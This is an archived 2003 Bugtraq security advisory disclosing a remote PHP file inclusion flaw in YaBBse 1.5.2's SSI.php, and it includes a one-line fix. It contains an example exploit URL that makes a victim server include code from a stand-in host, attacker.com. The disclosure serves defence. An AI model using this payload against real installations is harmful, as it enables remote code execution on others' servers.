lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 9 May 2003 15:54:48 -0000
From: DownBload <downbload@...mail.com>
To: bugtraq@...urityfocus.com
Subject: II-Labs Advisory: Remote code execution in YaBBse 1.5.2 (php version)




                
                  [ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name: Remote code execution in YaBBse 1.5.2 (php version)
Advisory number: 13
Application: Yet another Bulletin Board 1.5.2 
Vendor: www.yabbse.org                                        
Date: 06.05.2003
Impact: Attacker can execute arbitrary php code 
Tested on: *
Discovered by: Dalibor Karlovic & DownBload
Mail me @: downbload@...mail.com	
Homepage: www.kamikaza.org



======[ Overview 
YaBB is widely used bulletin board system. 



======[ Problem  	
One of the files that are included in main application is vulnerable 
to remote code execution if it is accessed directly with certain 
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.

SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');    
------------------------------------------

We can define $sourcedir variable through URL and include some other
PHP script local or remote if remote inclusion is enabled in php.ini file.
Bug in not exploitable if PHP's registar_globals is set to off. 




======[ Exploit

Exploit would look like this:
----cut here----
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
----cut here----

Attacker would place an Errors.php file on his server. The code included
would get executed on victim's server.
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim.




======[ Solution

Add this line before include_once() lines mentioned above.

----cut here----
if (!isset($sourcedir)) $sourcedir = "";
----cut here----




======[ Greetz 
Greetz goes to #hr.hackers and #linux <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
Shitz goes to stupid darkman, who will exploit this bug and claim that
he is a great hacker.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ